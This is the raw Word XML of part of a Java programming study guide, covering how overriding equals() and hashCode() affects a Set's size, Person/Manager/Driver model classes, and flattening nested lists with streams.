    <w:p w14:paraId="72A371A5" w14:textId="12F5AE0F" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="0077366D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc197867611"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0077366D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Given two Employee objects with the same name, determine the size of a Set after adding these objects, considering whether equals() and hashCode() are overridden in the Employee class.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w14:paraId="7F4E435B" w14:textId="0026502F" w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We have 2 Employee object and if I add these objects in Set and check for the size then what will be the output 1 or 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787B09B1" w14:textId="77777777" w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF1FBB" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Employee e1 = new Employee(“Swapnil”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034BBEE8" w14:textId="232FD373" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF1FBB" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Employee e2 = new Employee(“Swapnil”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F64BE" w14:textId="13424768" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00666C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scenario, if you add the two Employee objects into a Set, the output for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size of the set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will depend on how the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Employee class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is implemented, specifically how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is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264876C3"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4500D0FC"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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java’s Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default because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s equals() method compares memory references, not the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E2B96"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>considered different objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the Set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BB03BD"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f you add both e1 and e2 to a Set, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not remove duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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26680C"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37725852"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48C4F1D8" w14:textId="4F5A1974"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155046C3" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B7676E"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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07B077"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3809A657"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equals() and hashCode() compare memory addresses (references), so e1 and e2 are considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distinct objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F1AAA"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903" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663CA9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equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61052F"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he Set to treat e1 and e2 a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y have the same name), you need to </w:t>
      </w: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xml:space="preserve"> in the Employee class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA655E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39B08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2369E7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DAA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53302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C6C3AA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3F7F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1CC39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and hashCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689507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E033A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77E3"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1E9157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E9FD9A"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CB2E8B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695AFC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85718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6255F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88998FC"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BEDFB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299B6C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91185" w14:textId="681E8112"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D8833"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when you add e1 and e2 to a Set, the set will consider them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ustom equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74768EE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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>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3551B9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7D6519F7" w14:textId="4970089D"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3FFD6872" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779CA9B0"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5026C1B1"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904" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E18DC5"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D08C30A" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="008A3FE0">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verriding equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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With equals() and hashCode() overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6B593A" w14:textId="299779A1" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="_Toc197867612"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00773FFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Person Management System</w:t>
      </w:r>
      <w:r w:rsidR="00F00004" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>, Write model classes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="6524CDF5" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">You are required to design a basic </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Person Management System</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Managers</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Drivers</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AF26A" w14:textId="45909415" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="004F747E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70684898"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Person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5F2DE"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lastRenderedPageBreak/>
        <w:t>- Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE2B96" w14:textId="55779C0E"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river</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAFBCB"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Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AA6F0"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64531955" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFAB0B"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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551A4AF"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Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28277F54" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4C845F"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methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287EF599"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eat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0B431"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Sleep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB09E3" w14:textId="152D8BD4"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doWork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842BF60" w14:textId="67503FB1"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Management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2129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90CD4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lass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FF82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EF3E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A6112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8FDA0A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ate of Joining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45085DF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D0A856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ACC01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52465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46147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5300054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p>
    <w:p w14:paraId="42D7A60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0817B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3309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BA13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939F3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ating."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F75E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6A8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33B0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le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909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sleeping."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67833C2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8965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9B609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55F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orking."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA483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703BB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0CD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D5F84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ager class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA21AE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EECD5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91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7D8BB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657F6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5C51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4F8185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AB8E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managing the team."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823E342"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D252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B074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78748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river class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B1F8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6737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D9414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CAA03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4527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ED3F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1AB7821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07517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driving the vehicle."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC0F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69D08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2B89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2167E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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CE9D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C3581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manag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0-01-0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2417176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driv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2-03-0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s Angeles"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9112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4A78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Manager Actions ---"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB475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474C02D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4A16853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5D0274C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46437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 Driver Actions ---"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C980CC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102EACC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69A7CF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65D6D0D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5E19A6" w14:textId="789DCDA9"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D6D5FE" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DC7692" w14:textId="7FB12809" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc197867613"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00E97FC7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Flatten a List of Lists using Java 8 Streams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="501D40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list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D45EF6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EFF219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2CB91E90"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4D6395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621C2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03DE55A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03882FC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p>
    <w:p w14:paraId="2814F09B" w14:textId="4BD924B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p>
    <w:p w14:paraId="65D2B566" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC" w:rsidP="005F51EC">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366DB819" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">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12C9874D"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85846C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DA0F84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23C93"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tenLis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A9962"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9B377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34ABBB8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3B46081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B0BF8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09D3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listOfLis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58B6A5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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C84D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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040227F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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C511F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4F10A3" w14:textId="25E653E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lattening using flatMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E2A3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lat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FE724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175E0E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240D2D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E6017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ttened Li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tList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D2E6E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73273D" w14:textId="3F101F2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974712" w14:textId="77777777" w:rsidR="007D023E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D023E" w:rsidP="005F51EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
